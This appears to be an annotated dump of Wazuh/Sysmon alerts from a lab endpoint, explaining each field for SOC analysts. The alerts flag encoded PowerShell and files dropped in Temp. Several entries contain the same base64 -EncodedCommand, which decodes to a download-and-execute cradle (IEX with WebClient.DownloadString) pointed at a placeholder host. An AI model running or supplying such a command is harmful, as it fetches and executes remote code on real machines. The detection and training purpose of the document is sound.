data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:08.774+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:08.774+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  105
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534408.1990596
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:06.7153003Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285734
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:06.664 ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} ProcessId: 16460 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mpyc2gxe.upa.ps1 CreationUtcTime: 2025-04-24 22:40:06.664 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:06.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc5-680a-c20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16460
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpyc2gxe.upa.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:06.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:11.234+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:11.234+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  102
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534411.1993365
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:08.9554346Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285771
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:07.867 ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} ProcessId: 16560 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00} ParentProcessId: 16460 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:07.867
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc7-680a-c40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16560
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc5-680a-c20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16460
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:11.248+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:11.248+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  106
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534411.2001436
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:09.1484914Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285772
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:09.120 ProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} ProcessId: 16560 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1 CreationUtcTime: 2025-04-24 22:40:09.120 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:09.120
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc7-680a-c40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16560
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f5a3xdyh.wwv.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:09.120
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:13.645+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:13.645+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  103
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534413.2004205
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:11.7337351Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285800
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:10.418 ProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} ProcessId: 16772 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc7-680a-c40b-000000000e00} ParentProcessId: 16560 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:10.418
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdca-680a-c70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc7-680a-c40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16560
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

